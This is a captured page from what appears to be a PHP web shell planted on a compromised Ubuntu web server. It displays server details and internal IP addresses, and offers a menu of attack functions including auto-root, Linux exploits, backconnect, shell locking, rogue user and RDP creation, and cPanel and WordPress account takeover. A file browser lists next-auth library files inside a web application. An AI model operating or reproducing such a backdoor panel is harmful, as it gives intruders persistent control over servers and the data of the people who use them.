Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next-auth /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
pages
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
errors.d.ts
1.93
KB
-rw-rw-r--
errors.d.ts.map
1.19
KB
-rw-rw-r--
errors.js
13.23
KB
-rw-rw-r--
index.d.ts
1015
B
-rw-rw-r--
index.d.ts.map
1.21
KB
-rw-rw-r--
index.js
11.38
KB
-rw-rw-r--
init.d.ts
973
B
-rw-rw-r--
init.d.ts.map
849
B
-rw-rw-r--
init.js
4.86
KB
-rw-rw-r--
types.d.ts
22.19
KB
-rw-rw-r--
types.d.ts.map
5.39
KB
-rw-rw-r--
types.js
79
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : init.d.ts
import { AuthOptions } from ".."; import * as cookie from "./lib/cookie"; import { RequestInternal } from "."; import type { InternalOptions } from "./types"; interface InitParams { origin?: string; authOptions: AuthOptions; providerId?: string; action: InternalOptions["action"]; /** Callback URL value extracted from the incoming request. */ callbackUrl?: string; /** CSRF token value extracted from the incoming request. From body if POST, from query if GET */ csrfToken?: string; /** Is the incoming request a POST request? */ isPost: boolean; cookies: RequestInternal["cookies"]; } /** Initialize all internal options and cookies. */ export declare function init({ authOptions, providerId, action, origin, cookies: reqCookies, callbackUrl: reqCallbackUrl, csrfToken: reqCsrfToken, isPost, }: InitParams): Promise<{ options: InternalOptions; cookies: cookie.Cookie[]; }>; export {}; //# sourceMappingURL=init.d.ts.map
Close